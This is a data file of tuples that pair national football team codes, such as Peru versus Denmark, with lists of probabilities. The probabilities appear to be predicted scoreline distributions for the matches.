('AUS', 'COL',0.000184141754730578,0.000292732969244387,0.000286316813340349,0.00019071049147292,9.61001905953001e-05,0.000831757501517883,0.00169857747534887,0.0017343789713332,0.00118062337842828,0.00439663685787558,0.00897861254085185,0.00916785781549569,0.0174303348254333,0.0355954398586609,0.0460680260765671,0.060878435435864,0.0940780351059552,0.036345697068388,0.00624072791816683,0.000602753889748186,3.8909492860847e-05,0.124323181909548,0.0960609498949132,0.126943583959199,0.0247411784699084,0.06539043950284,0.0864128114102401,0.00318613293304667,0.0126313283576887,0.0333843480341303,0.0441170818342921,0.000259344332597722,0.00138892760974779,0.0056273559983563,0.0155267903639968,0.0336345647368895),
('AUS', 'JPN',0.00363067320934229,0.00408619743584465,0.00329061827725134,0.0018256019459443,0.000769935373099727,0.00695868992935904,0.0119817305834955,0.0103152942028482,0.00592041879926117,0.0199873373714349,0.0344149392913132,0.0296284598697336,0.0430569898129183,0.0741371230665275,0.0618359626830293,0.0444026196158955,0.106471455512515,0.063826025001548,0.0170051272757196,0.00254849920438771,0.000261547068246338,0.0764540784026707,0.0916632518285727,0.065820734845892,0.0366326728904098,0.0526097296553548,0.0377775280374656,0.00732001481687265,0.0157688739397042,0.0226463462663243,0.0162616874602233,0.000951949267478798,0.00279077711052833,0.00621950897807528,0.0095489907262748,0.0111631241496448),
('PER', 'DEN',0.00297127097814823,0.00242863599137762,0.00130648855802663,0.000477174993278406,0.000131681620060176,0.00821864419319424,0.00917394862562723,0.00512014703443062,0.00190509791904692,0.0277524209691576,0.0309782584843693,0.0172895276378032,0.0702850298246697,0.0784546985616122,0.118667975500101,0.100178433760511,0.132461496708498,0.0437869895036525,0.00643306586755978,0.000531634842234638,2.91795060165417e-05,0.111822799857399,0.0739291625913031,0.0624103317378718,0.0162922084119434,0.0275074705594338,0.0232215583500463,0.00179520534004686,0.00454648843093091,0.00767620898901334,0.00648018633921215,0.000124085772786059,0.000423712555885822,0.00109319112439235,0.00191491606210142,0.00217985818346385),
('PER', 'ARG',0.000709107277284275,0.000815294406359792,0.000589064582557324,0.000289184577623122,0.000107300259285024,0.00263358738411851,0.00395449947502238,0.00296896662557231,0.00148603093420352,0.0114736849638398,0.017228469972058,0.0129348234030112,0.037490339444396,0.0562941364867214,0.0816666169055925,0.088948732068652,0.12262763545555,0.0422646186957813,0.00647415418542436,0.000557842563399671,3.19743294268188e-05,0.133562195957711,0.0920666090209341,0.10027607911981,0.0211543404574784,0.0460812957053553,0.0501903100726006,0.00243033888697449,0.00794114795070137,0.0172985013497257,0.0188409881546177,0.000175484901909266,0.000773487144040773,0.0025767950004307,0.00583271029675454,0.00924946631100487),
('PER', 'ICE',0.0106793637769269,0.00715398972362269,0.00344134689634117,0.00112807296232302,0.000279822219536311,0.0196539201660063,0.0197654687747761,0.00993882524674041,0.00333174481923762,0.0496632061084665,0.0499450766717767,0.0251142735157043,0.0941199269715415,0.0946541179534173,0.118915139896269,0.0751212360206404,0.119590059622463,0.0475956704059515,0.00841893771120552,0.000837663652262924,5.57784894221026e-05,0.0755475972399996,0.0601344049755985,0.0379881891664363,0.015955268792474,0.0201585687705995,0.0127345988389324,0.00211668014627729,0.00401145629532297,0.00506824539600774,0.00320171896476882,0.000177772959429493,0.00045530686715499,0.000882427366747046,0.00116541964037795,0.000992069180239954),
('PER', 'CRO',0.00190498098631843,0.00168086582946282,0.000955349970175034,0.000368404301478736,0.0001073100558284,0.00593579145404116,0.00699065808753884,0.00411649405772177,0.00161601603311757,0.0219756227983733,0.0258809741604992,0.0152401783931696,0.0610189897735878,0.0718628505830966,0.112952949339994,0.104544247716518,0.13302614401613,0.0423169025994251,0.00598285149585865,0.00047580072678491,2.50957321566143e-05,0.123123107754667,0.0783333020306292,0.0725018353198792,0.0166123871706479,0.0307513797502228,0.0284621152525646,0.0017615203263077,0.00489115561197625,0.00905407405306993,0.00838004997814331,0.000116972134363217,0.000437732386197385,0.00123733835473681,0.00237301794824041,0.00298482184097712),
('PER', 'NGA',0.00552501204529118,0.0035161087773598,0.00149740067219756,0.000431962344681508,9.40631367483073e-05,0.0138194796243634,0.0121549335454837,0.00534544040408943,0.00156719535634092,0.0421056405516777,0.037034047352506,0.016286661897761,0.0962166276041353,0.08462740611716,0.14657797714221,0.111649638519334,0.128922768427112,0.037217048884651,0.00477498184750851,0.000344606959286863,1.64396080598347e-05,0.0982015223053159,0.0566970582585708,0.043186610861313,0.0109114276429153,0.0166226465368588,0.012661605196491,0.00104995970570112,0.00239928856749733,0.00365511527021213,0.00278413105858154,6.30186294120776e-05,0.000193885299776386,0.000450283997201187,0.000708370207742142,0.000688322575733077),
('PER', 'BRA',0.000168015839917786,0.000245882142110201,0.000217283467701363,0.00013033488722109,5.90651283115163e-05,0.000843350457213655,0.00154571027947765,0.00141650499365153,0.000865399949645489,0.00473294572302653,0.00867464147759217,0.00794953176820329,0.0199212335383605,0.0365120516586355,0.0558997248808686,0.078428357253573,0.102454179788796,0.0334600242940724,0.00485668912057557,0.000396530762088504,2.14925149742578e-05,0.14374512632615,0.0938900770850437,0.131729530402599,0.0204420764268415,0.0573612294667256,0.0804788754633067,0.00222536023834724,0.009366665837602,0.0262832139568438,0.0368758396999719,0.000151884903703971,0.000861841886229045,0.00369468195088267,0.0107512960715031,0.0233207899073991),
('PER', 'SWI',0.00210640278051419,0.00184693830395886,0.00104957214513826,0.000404846255947065,0.000117977092811158,0.00634967831831681,0.00748339371515645,0.00440976524231924,0.00173237172264788,0.0229624948410269,0.0270623771730226,0.0159471403984033,0.0622798679190367,0.0733997454361812,0.112612094195806,0.1018104580412,0.132718634820369,0.0432525213211751,0.00626481764112229,0.000510420332010395,2.76049815952526e-05,0.119988399986328,0.0782075679986704,0.0707059785815567,0.0169917083455945,0.0307237623440249,0.0277767706864174,0.00184584535672208,0.00500638131054566,0.00905234873741541,0.0081840567648307,0.000125704816188176,0.000459619643686929,0.0012696235751469,0.00238050609227497,0.00293183506935146),
('PER', 'CRC',0.00552984962386939,0.00311900382497287,0.00116195986731593,0.000292535518858964,5.55410571787798e-05,0.0145997707347074,0.011179866184472,0.00428052639229355,0.00109261332785127,0.0454630661699316,0.0348136286076973,0.0133293774368904,0.10617754328796,0.0813061209881505,0.165316180780358,0.128696891929797,0.126591904272764,0.0311303365355288,0.00340235151118947,0.000209168880435036,8.4593608902254e-06,0.0985504537213145,0.0484692730976421,0.0377328146120843,0.00794608360795301,0.0123718834844915,0.00963137996689569,0.000651343012483214,0.00152119086391464,0.00236846188066641,0.0018438224332133,3.31098647409629e-05,0.000103959727817576,0.000246161949274885,0.000393902707533054,0.000378398446879539),
('PER', 'SRB',0.00500680044237215,0.00391928374382737,0.00209495728562147,0.000762070190444997,0.00020965832228401,0.0115644607370518,0.0128881926536653,0.00718172311078025,0.00266792757401595,0.0344945387426591,0.0384429737731159,0.0214216842200128,0.0771678786060815,0.0860009393229503,0.11508839187537,0.0858215761772598,0.128262043550198,0.0479225404276365,0.00795790942241233,0.000743328317285406,4.6339126300817e-05,0.0956451868153184,0.0714718120029341,0.053296631036247,0.017802672847672,0.0265509565136654,0.0197990857278136,0.00221720389926749,0.00496011622651472,0.00739753133474787,0.00551634955205764,0.000174238331733367,0.000526330054648784,0.00120245813992669,0.00186953283998616,0.0019028383518906),
('PER', 'GER',0.000442063915193944,0.000614386904953923,0.000538726343135574,0.000322005552483296,0.00014566423309648,0.00165978428455735,0.00304468688628522,0.00279256717929145,0.00170754973983999,0.00753793077800304,0.0138274830067043,0.0126824782511036,0.0256752041256006,0.0470982633292979,0.0583021279363089,0.0661949580862819,0.106948671596528,0.043198223425692,0.00775485818167243,0.000783076805362851,5.29555503085316e-05,0.121427177434236,0.0980926319598261,0.111372224153588,0.0264140879829453,0.0599799530071535,0.0680999238940822,0.0035563529596011,0.0121134155870601,0.0275066130671292,0.0312304055361974,0.000303378235136645,0.00139677466221627,0.00486701510636438,0.0115602686303042,0.0207333596168995),
('PER', 'MEX',0.00271319548494697,0.00229384756529343,0.00127372709510347,0.000480352636891021,0.00013689208272703,0.00760815515476833,0.00877193924106568,0.00505687098144432,0.00194346566707158,0.0260616462253299,0.0300481749596632,0.0173222522207555,0.0669553975462004,0.0771972531039362,0.114677464393701,0.0982065772269826,0.132219142422529,0.0445028788207932,0.00665731884220971,0.000560187141358586,3.13279194673408e-05,0.113228780300071,0.0762220446509515,0.0652744299325768,0.0171034256937589,0.0292937920300295,0.0250863852325138,0.00191891448072221,0.00492991428104962,0.00844368176649184,0.0072309332078901,0.000135162768394533,0.000468293008312528,0.00122606255616348,0.00218011570430745,0.0025391431052052),
('PER', 'SWE',0.0023697055691727,0.00217363394552515,0.00131226889402488,0.000538830610426726,0.000167290876969541,0.00663063310099724,0.00833608690729745,0.00524009878600919,0.00219596521265452,0.0229809462724572,0.0288918361823284,0.0181615279912764,0.05973681738228,0.0751016220742404,0.103520174456893,0.0896969991806458,0.130146421584006,0.0472091909591347,0.00761094118759317,0.000690196417870597,4.17212060287564e-05,0.11276781102263,0.0818105801114887,0.070886313472009,0.0197839287573389,0.0342843131949306,0.0297062869985333,0.00239213459030648,0.00621812981418603,0.0107756306975786,0.00933674757526738,0.000182235260893681,0.000639399908344516,0.00169630249002722,0.00306074414935559,0.0037052547329891),
('PER', 'KOR',0.0094938823978778,0.00586923163299759,0.00254149847670778,0.000747511363112034,0.000166149726464335,0.0193391552092548,0.0173919018355631,0.00782035839169211,0.00234430966598691,0.0513674272088696,0.0461952573365028,0.0207719357999814,0.102329156166907,0.0920256660497338,0.135900080015728,0.0902422752228956,0.122216344276902,0.041379815534118,0.00622680540176874,0.000527065468241014,2.96569442354098e-05,0.0811558092952989,0.054955209763973,0.0364921283628269,0.0124044316992483,0.0164739290699111,0.010939249196596,0.0013999575876625,0.00278885835633649,0.0037037936007258,0.0024594449204652,9.92200704653379e-05,0.000266573884092849,0.000541239588590391,0.000746415847570303,0.000643972225146507),
('PER', 'BEL',0.00153625962914037,0.00182296042509677,0.00144414186821998,0.000782718833112658,0.000321557939341819,0.00412407271252742,0.00688639483205449,0.00574946625442548,0.00320016138264471,0.0146082880828703,0.0243929839678771,0.0203657561885992,0.0388091024796724,0.0648036107464513,0.0687347906765259,0.0608680843858787,0.114773657084017,0.05410467773607,0.0113356098808211,0.00133591090308876,0.000106247305367635,0.101637796171419,0.0958247797860709,0.0848576204985631,0.0301147432908466,0.0533362135199558,0.0472318765126412,0.00473206286254057,0.0125714328421503,0.0222652612325113,0.0197169990078543,0.000475486139907412,0.00171144534280693,0.00466923502600444,0.00871548864398243,0.0120224885565108),
('PER', 'TUN',0.0090522636352932,0.00547017743634785,0.00229725555791322,0.000654703899048271,0.000140952618562006,0.0190521065420375,0.0165864788183141,0.00721997011152978,0.00209519930791763,0.0514943680926139,0.0448302261876429,0.0195142619909486,0.104384911692318,0.0908759418763497,0.141066686094239,0.0953193790318413,0.122810545684763,0.0395576174660953,0.00566294147847876,0.000456012290087763,2.43649107618504e-05,0.0829836248184982,0.0534585115344437,0.0361221509097164,0.0114794232465697,0.015513393357461,0.0104824679905078,0.00123251802464589,0.00249845351884811,0.00337643202020674,0.00228146993751826,8.2916523665413e-05,0.000226558730176537,0.000467641583804493,0.000655048057094461,0.000569347326796133),
('PER', 'PAN',0.0196206832080348,0.00888477366211402,0.00292921644768818,0.000654446512797461,0.000110392271131432,0.033913649355793,0.0231122227783994,0.00787551401729519,0.00178905974359103,0.0779597300835334,0.0531297186726007,0.0181040070508525,0.134408703357204,0.0915998117087588,0.154487447291122,0.0887828346468758,0.105283517583128,0.0312127313764102,0.00411263952311425,0.000304811986789907,1.49465176767416e-05,0.0605056870090532,0.0358754684249149,0.0206173759544764,0.0070905138471501,0.0081497355220923,0.0046835949066476,0.00070069310344826,0.00120804999433558,0.00138851543957667,0.000797969924664901,4.32356176661404e-05,0.000100387619695894,0.000175978844720994,0.000209053944488306,0.000148298692071097),
('PER', 'ENG',0.000433216272354982,0.000483191885506472,0.000328232494923337,0.000150986609162069,5.24209278112907e-05,0.00194153972452612,0.00272216600107762,0.00190832761334089,0.000891866814489562,0.00962176951897577,0.0134903517676691,0.0094571788721679,0.035762253859712,0.0501410248521057,0.0886142476948894,0.109787332271267,0.124242985728749,0.0351505023016988,0.00441986162953022,0.000312613938466473,1.46063268188886e-05,0.153929038629791,0.0870984063191705,0.107909302664114,0.016427769685018,0.0407058922419523,0.0504319726592154,0.00154923395403502,0.00575820256793924,0.0142680825049326,0.0176772331266232,9.10587544551147e-05,0.000455588167630921,0.00172041246438024,0.00439934115026942,0.00764949478379353),
('PER', 'POL',0.00536520534714744,0.00488501512244502,0.00314613708852812,0.00138735241710165,0.000463866447133895,0.0106770416576889,0.0145171786409809,0.0098692354329434,0.00447294479823637,0.0298965419260683,0.0406492223036107,0.0276346220572017,0.062784471190119,0.0853657233312477,0.0879006861366745,0.0615321788719163,0.119515311845951,0.0580343083387633,0.0125245911724211,0.00152042440146523,0.000124759948415526,0.0836630277834613,0.0812502745622783,0.0568767622585428,0.0263023675305817,0.0368243310667715,0.0257777433331532,0.00425730584567763,0.00894058907804339,0.0125171702417676,0.0087622610486691,0.00044150362369227,0.00125680940048634,0.00271269883184304,0.00400895483054852,0.00413696011297485),
('PER', 'SEN',0.00600478318245013,0.00381667609298889,0.00163451110679856,0.000474369668173161,0.000103942080251327,0.0145483505883208,0.0128794241858423,0.0057009750470279,0.00168232761640392,0.0433890337375314,0.0384116238557042,0.0170026008894022,0.0970526643508973,0.085919185474184,0.144725042961878,0.107907073960324,0.128122786655737,0.038031446544615,0.0050173776925839,0.000372334493516699,1.82811947508027e-05,0.095528422260031,0.056712536146061,0.0422848990551174,0.0112228789436907,0.0167355697872356,0.0124780503072649,0.00111045123656918,0.00248385921181657,0.0037039336688554,0.00276165504027242,6.86088788064844e-05,0.000206678236683837,0.000470061443216094,0.000724504314444532,0.000691500073113048),
('PER', 'COL',0.000691984687645611,0.000714263498553374,0.000455688218601409,0.000196947595638426,6.42563795427205e-05,0.00278885884832587,0.00367540473583859,0.0024218866401815,0.00106392543941174,0.0126557070290573,0.016678809534554,0.0109904048367755,0.043073241363975,0.0567657253044935,0.0977321465770079,0.110875942604802,0.128800062645133,0.0374054455539568,0.00482804236221522,0.000350533749757578,1.68263076387881e-05,0.146122119011109,0.0848720544796314,0.0962863230863393,0.016432067643927,0.0372839654663821,0.0422982095443153,0.00159070526046588,0.00541390784929504,0.0122840264332707,0.0139360799642112,9.60715452143082e-05,0.00044025848123377,0.00152301216463241,0.00356921370808437,0.00560452366649769),
('PER', 'JPN',0.0108682428164365,0.00786877148097993,0.0041577856244197,0.00150137933123708,0.000410744749104345,0.0187541932584092,0.0208391717523468,0.0115779728122692,0.00428838074867505,0.0462446879762333,0.0513858944552733,0.0285493346860242,0.0855237200776521,0.0950317332790993,0.105443558543483,0.0650015225496387,0.117166139667512,0.0527983951226049,0.0105744260450575,0.00119128428679578,9.0355620688551e-05,0.0722280011681433,0.0650959834541517,0.040128938124191,0.0195560677914859,0.024110987889437,0.0148634107634275,0.00293750679513546,0.00543254846918807,0.00669787565404122,0.00412895886078518,0.000281356894891621,0.000704468400456017,0.00133634539028103,0.00173240369672087,0.00148912783031504),
('DEN', 'ARG',0.000683611409778811,0.000835920717637714,0.000647415166281184,0.000341273889303863,0.000136063521372196,0.00245058644332672,0.00395813207986773,0.00319654293451693,0.00172099473961155,0.010532996006307,0.0170126581346325,0.01373923129908,0.0339543230063342,0.0548422584755335,0.0729704413399659,0.0784095343081361,0.117860214862585,0.0442899909112625,0.00739709907747458,0.000694927994347014,4.35822492496377e-05,0.126645315433643,0.0951825834705934,0.102277331850081,0.0238453989003733,0.0512455890038854,0.0550653483157716,0.00298690699487891,0.00962863793295564,0.020692680556153,0.0222350778781207,0.000236147778014825,0.00102798641638613,0.00338461550871564,0.00758461808487653,0.0122361621551215),
('DEN', 'ICE',0.0106394309927896,0.00755932636336055,0.00389582228478176,0.00137086287641586,0.000365323884721582,0.0188163398739192,0.0203549268830158,0.0110096610496285,0.00396996878198391,0.046908054282675,0.0507436633025438,0.0274464524774901,0.0877043132988465,0.0948757779932307,0.109320907164028,0.0681326852331854,0.118259931900627,0.0513168218942043,0.00989690409365669,0.00107364695826344,7.82673220886867e-05,0.0737038040106447,0.0639649443823082,0.0398652328691255,0.0185043099866816,0.0230650908501556,0.0143749865925516,0.00267654018454762,0.00500434568204244,0.00623777313960749,0.00388760251723141,0.000246300188119797,0.000623113798448453,0.00119387584855306,0.0015618157620286,0.00134363082794465),
('DEN', 'CRO',0.0018758326310041,0.00176079280140545,0.00107305817194865,0.00044437929494317,0.000139097441502316,0.00564784857067194,0.00715482371017953,0.00453194713732001,0.00191372475292362,0.0206287212100556,0.0261329357148167,0.0165529002530182,0.0565096779911852,0.0715877522009837,0.103200570833602,0.0942348125045287,0.130736842864126,0.0453445006887921,0.00698986417692622,0.000606087568816772,3.49679595024647e-05,0.119378815206356,0.0828102109514401,0.0756159063795468,0.0191478167656694,0.0349686229099117,0.0319306530655756,0.00221372994150834,0.00606422302576383,0.0110747627692857,0.0101126203534135,0.000160903061200658,0.000594626342919054,0.00166095842096946,0.00315274549216858,0.00401108029881018),
('DEN', 'NGA',0.00554114598807681,0.00375202261981618,0.00171378212928615,0.000531004917010723,0.000124268801127845,0.0134066269505818,0.0126840191859523,0.00600017973583671,0.00189225808920347,0.040299050948611,0.0381269604421767,0.0180359720432747,0.0908513479944486,0.0859545242273789,0.136545274030295,0.102610540578593,0.129185579783453,0.0406608179088687,0.0056879486112219,0.000447566677224294,2.33481665803962e-05,0.0970799046007113,0.0611112839404614,0.045923683006351,0.0128230761392278,0.0192724762372177,0.0144828095958138,0.00134534304526014,0.00303298033823927,0.00455842583027699,0.00342554908585386,8.83516726888644e-05,0.000268413204888322,0.000615904833560731,0.000958685410043165,0.000937365543962258),
('DEN', 'BRA',0.000158180131603712,0.000246412880675424,0.000233459503891012,0.000150381582920259,7.32323639548455e-05,0.000767466885525573,0.00151305990367457,0.00149149775403009,0.000980161919949666,0.00424922560560754,0.00837734240625793,0.00825795948549704,0.0176449810941867,0.0347870558303329,0.0488473880045868,0.0676132012308238,0.096302557912138,0.0342913162355665,0.00542685190259298,0.000483096967489652,2.8644618840963e-05,0.133299332741088,0.0949301798854612,0.131399725096279,0.0225350941818287,0.0623849061296166,0.0863514587824377,0.00267475775562955,0.0111069767553245,0.0307479390444918,0.0425604453989046,0.0001998433416607,0.00111987077513931,0.0047442923955389,0.0136650090725298,0.030315368929257),
('DEN', 'SWI',0.00207432599068351,0.00193443090416419,0.00117859502283377,0.000488194740367933,0.000152876080019511,0.00603916609685936,0.00765597156125115,0.00485281408116663,0.00205066980007786,0.0215462168681464,0.0273145697517516,0.0173136129950104,0.0576535883286875,0.0730886062031077,0.102846709084781,0.0917327600605423,0.130380828626461,0.0463279434252914,0.00731627107597087,0.00064991877268773,3.84515500479098e-05,0.116291453322308,0.0826431911365751,0.0737124998031738,0.0195769532673137,0.0349228083770098,0.0311489364122259,0.00231874576695145,0.00620452373169706,0.0110680855388484,0.00987203231002541,0.000172860966402251,0.000624177189078372,0.00170387134069413,0.00316215253581977,0.00393993516162039),
('DEN', 'CRC',0.0055825611979787,0.0033539205632536,0.00134069406503277,0.000362617493596656,7.40001614667891e-05,0.0142915894002477,0.0117719271594031,0.00484824553677322,0.00133116039351104,0.04390560053288,0.0361648741009839,0.0148944337722993,0.101162738315835,0.0833273580249327,0.155392470806304,0.119346413438812,0.127996179866445,0.0343182119771091,0.00408949591580584,0.000274117922629773,1.21175192525419e-05,0.0983051812077214,0.0527149802541745,0.040486799618983,0.00942259302123721,0.014473708752337,0.011116273650752,0.00084212550982448,0.00194033839750501,0.00298048454211772,0.00228910795076397,4.68143613692913e-05,0.000145124796402309,0.000339444670565032,0.000537203106845594,0.000517884530237774),
('DEN', 'SRB',0.0049542253242581,0.0041178251231208,0.00235873349533501,0.000921171636477709,0.000272289307579913,0.0110170981813067,0.0132071867714204,0.00791632150066278,0.0031633355983358,0.0324204382012741,0.0388652960597229,0.0232956635014043,0.0715536520505505,0.0857778002207803,0.105281840835206,0.0774542297423123,0.126210814559937,0.0514147831721993,0.00930886923107842,0.000948043744830922,6.46854785951757e-05,0.0928513535604976,0.0756501291462797,0.055654635561541,0.0205451754171073,0.0302295386218324,0.0222394062532059,0.002789844760896,0.00615733754296876,0.00905971690598687,0.00666509427523201,0.000240140470267985,0.000716489937950005,0.00161801737904142,0.0024911907112789,0.00256531857025427),
('DEN', 'GER',0.000417101022809483,0.000615711961749225,0.000578380746620672,0.000371091951705854,0.000180344081137181,0.00150680910713042,0.00297321072889507,0.00293334503905798,0.00192934258679644,0.0067512693949774,0.013321492751683,0.0131428742323011,0.0226868344974173,0.0447652854055586,0.0508242652259449,0.0569296244491768,0.100285596856901,0.0441650592035933,0.00864443378861129,0.000951736695051856,7.04648925413816e-05,0.112332590374774,0.0989409378791263,0.11082640174073,0.0290485873415162,0.0650762056580576,0.0728936056865884,0.00426426333035457,0.0143295476404972,0.0321018223115857,0.0359581133186723,0.000398599324610722,0.0018128040616326,0.00624478977423814,0.0146931953008991,0.0269926104403646),
('DEN', 'MEX',0.00267675520103486,0.00240594426261767,0.00143219473957357,0.000579978939179343,0.000177604727510567,0.00724404017483478,0.00898407917875005,0.00557104024425783,0.00230307330598411,0.024481049919118,0.0303614675711409,0.0188271891140087,0.0620498151595371,0.0769543568182655,0.104847887762254,0.0885826939205357,0.130032647893518,0.0477195058364547,0.00778317778620975,0.000714069512180018,4.36900405294308e-05,0.109860508340875,0.080633429433219,0.0681246570788563,0.0197272888451971,0.0333339359896044,0.0281627976676979,0.00241317979352564,0.0061164598997881,0.0103352104986366,0.00873189539383959,0.00018609574369583,0.000636760419720265,0.00164758500164869,0.00290010175503551,0.00341654984039021),
('DEN', 'SWE',0.00232317888973117,0.00226420199996803,0.00146501400339253,0.000645859354293474,0.000215449725896422,0.00626486181271572,0.00847218047789545,0.00572860537038072,0.00258232769987031,0.0214215607982624,0.0289690873680129,0.0195879289758297,0.0549353617946843,0.0742909123387822,0.0939207621683555,0.0802862607809234,0.127012162677994,0.0502330327481585,0.00882980207345224,0.000873041855526825,5.77538710901375e-05,0.108573774101572,0.0858813807282786,0.0734139584282408,0.0226439322535218,0.038713413478332,0.0330933772094995,0.00298520857230029,0.00765553521035739,0.0130883583592422,0.0111883179838413,0.000249063032812624,0.000863106935816697,0.00226324596457046,0.00404360267035331,0.00496225958212575),
('DEN', 'KOR',0.00951270948814544,0.00624689609293105,0.00289980526870775,0.000915837872266413,0.000218736785478459,0.0186841843502072,0.0180742459034931,0.00874210933848756,0.0028189087793441,0.0489610996917545,0.0473627822840658,0.0229083206853052,0.0962253384236976,0.0930840970212045,0.126077175731335,0.0825949510845024,0.121961431886686,0.0450227001546152,0.0073868289447646,0.000681721630208812,4.19683080630559e-05,0.0798986687514528,0.0589900225063247,0.0386452027904415,0.0145176501255678,0.0190214381790783,0.0124612147031732,0.00178642214576035,0.00351093167076733,0.00460012255074627,0.00301360571299007,0.000138619681677699,0.000367811024379683,0.000738036855345498,0.00100757311110043,0.00087598244237395),
('DEN', 'BEL',0.00146880159160168,0.00184743049238145,0.00156680725809687,0.000911231580337395,0.000402085589378444,0.00377808598024735,0.00678600084176929,0.0060943302594557,0.00364877264015918,0.013202967460941,0.0237144810288125,0.0212973565272207,0.034604496301707,0.0621547900868609,0.0604647486931703,0.0528253005426334,0.108603625665067,0.0558195949026309,0.012751066728566,0.00163843374244251,0.000142766519847319,0.0948820476355483,0.0975340819445955,0.085211090812903,0.0334200809595899,0.0583952090765537,0.0510172379177902,0.00572570013003251,0.0150068512673795,0.0262216066561595,0.0229086249800092,0.000630957787298012,0.00224384242633477,0.00605425855165679,0.0112019929000742,0.0158038222317817),
('DEN', 'TUN',0.0090844935192027,0.00583391778268069,0.00262685610928732,0.000803953967712289,0.0001859959581584,0.0184534413237832,0.0172808472596433,0.00809138189380007,0.00252574270877761,0.0492063107176251,0.0460795753378483,0.0215757616487582,0.0984068894775291,0.0921537829459523,0.131201543804881,0.0874626013898898,0.122864554038462,0.0431490099744941,0.00673492159756181,0.000591312118993362,3.45607543443009e-05,0.0819049319327661,0.0575286623971441,0.0383502077934221,0.0134690586557975,0.0179576988828882,0.0119711019682017,0.00157674047608588,0.00315329728041066,0.00420415149246317,0.00280260441687224,0.000116111334142446,0.000313309381912256,0.000639071734528728,0.000886022474536386,0.000775414682720341),
('DEN', 'PAN',0.019889426372322,0.00957052460636404,0.0033839285554654,0.000812009889261142,0.000147199100730822,0.0332035145225889,0.0243404000119518,0.00892157172607083,0.00218003653800111,0.0753020087157606,0.055201415880182,0.0202331675286309,0.128082657773415,0.0938931667211885,0.145238863274999,0.0823465400082923,0.106469814422495,0.0344149899377039,0.00494408898412109,0.000399528198585108,2.14248631965651e-05,0.060365529138141,0.0390247524923716,0.0221259879756987,0.00840949754401376,0.00953591911066642,0.00540661037173996,0.000906087091219829,0.00154118123535964,0.00174761684849152,0.000990851880057675,6.11802612875733e-05,0.00014027286252698,0.000242962751422287,0.00028560146224589,0.000203323931866701),
('DEN', 'ENG',0.000419890900443956,0.000498960056203521,0.000363552706257509,0.000179627297072381,6.70249486440435e-05,0.00182303245118039,0.00274940799094569,0.00207326103706534,0.0010422634841073,0.00891312039853023,0.013442330350243,0.0101365311566341,0.0326833383522289,0.0492914054153107,0.0798972419746828,0.0976578525480656,0.120497095593379,0.037169438164979,0.00509580611953721,0.000392972647033801,2.00769037346506e-05,0.147282776014435,0.0908639002272487,0.111062323942879,0.0186857069281435,0.0456788236200502,0.0558329137702837,0.0019213111176784,0.00704521632506357,0.0172226394813553,0.0210511144739094,0.000123553958241108,0.000610397409268201,0.00227734014484713,0.00576164470042626,0.0101617956042708),
('DEN', 'POL',0.00523727296003829,0.00504976780528683,0.00348125662054783,0.00164713687752202,0.000591496500700926,0.00997282122914751,0.0145856498788338,0.0106660481271913,0.00519984064687457,0.0275495658273466,0.0402923417795901,0.0294645806082321,0.0570785257127422,0.0834796265286346,0.078838703979531,0.0544472826475313,0.115304757472802,0.0610461461498873,0.014364375827183,0.00190124372427772,0.000170950443276662,0.0796313283175821,0.0843189095251586,0.0582320011328431,0.0297608100300985,0.0411065924155466,0.0283888768200353,0.00525211852617317,0.0108815937144451,0.0150300088337275,0.0103799669179915,0.000597443256528487,0.00168042315950004,0.00358731480557723,0.00525592724045013,0.00552098660206903),
('DEN', 'SEN',0.00602049151093078,0.00407044484931625,0.00186949006589453,0.000582731900890694,0.000137221481409672,0.0141021549608271,0.0134290298071203,0.00639401715771351,0.00202960581170491,0.0414933412507851,0.0395127778698815,0.0188133754468985,0.0915656528879787,0.0871950340466959,0.134708663061982,0.0990896877355693,0.12827873871488,0.041516516961365,0.00597179131725477,0.00048318212744436,2.59445703179376e-05,0.0943599310797222,0.0610778640075621,0.0449279677675975,0.0131782824518825,0.0193874968894515,0.0142611541758538,0.00142168632780031,0.00313731391309648,0.00461552284627971,0.00339510991482267,9.61200952793678e-05,0.000285925554338565,0.000642538905189865,0.000979964246885709,0.00094141873973187),
('DEN', 'COL',0.000674696632386793,0.000741706155045034,0.000507514036621448,0.0002355928333637,8.26066979503935e-05,0.00263269971484784,0.0037321271334187,0.00264534023030522,0.00125001546194401,0.0117865827565143,0.0167087135185922,0.0118431742776373,0.039576351689293,0.05610361681141,0.0885915590289273,0.0991559857865731,0.125587798478884,0.0397663716457862,0.0055963126390877,0.00044300690621906,2.32543882388633e-05,0.140563978074627,0.0890169182011044,0.0996320684799232,0.018790996656377,0.0420635965276752,0.0470796250246417,0.00198333958575298,0.00665955065913185,0.014907386611996,0.0166850728355663,0.000131068086020758,0.00059309664244321,0.00202718387784402,0.00470065809242111,0.00747788625825818),
('DEN', 'JPN',0.0107667315435576,0.0082576643375383,0.00467216364560711,0.00181055437662966,0.000532057586682737,0.0178027002853226,0.0212786667893171,0.0127166568294159,0.00506652547105125,0.0433087901491948,0.0517648053308489,0.0309359261908463,0.0790182643977905,0.0944465329103457,0.0961142235703118,0.0584544854466721,0.114880467810422,0.056443580776968,0.0123253823798974,0.00151394037913128,0.00012577967977222,0.0698676885093772,0.0686554049655657,0.0417546562966219,0.0224880519715166,0.0273534438059813,0.0166357425933261,0.00368297646578061,0.00671970764229034,0.00817354680693652,0.00497096532777219,0.000386765167053619,0.000956729134443375,0.0017946682762197,0.00230574926569573,0.00200842995584998),
('ARG', 'ICE',0.0387861323396851,0.0190378090452239,0.00758896451466213,0.00206758741684885,0.000426791966482087,0.0451653245415718,0.0378691049356569,0.0158757755333722,0.00443704261850141,0.0837008254209018,0.0701793992014327,0.0294211439821963,0.116336397124057,0.097542866684643,0.107797879951186,0.0499430238912191,0.0903837018586104,0.0408926659079531,0.00822277119373851,0.000930065455244067,7.08400994676955e-05,0.0418749921922908,0.0378913461255706,0.0175551541985498,0.0114288905783734,0.0105900664366369,0.00490640392273071,0.00172360648549623,0.00239565341887556,0.00221982428574963,0.0010284500714458,0.000165790925315626,0.000311998796757108,0.000444852545682354,0.000433505931186442,0.000266817036253726),
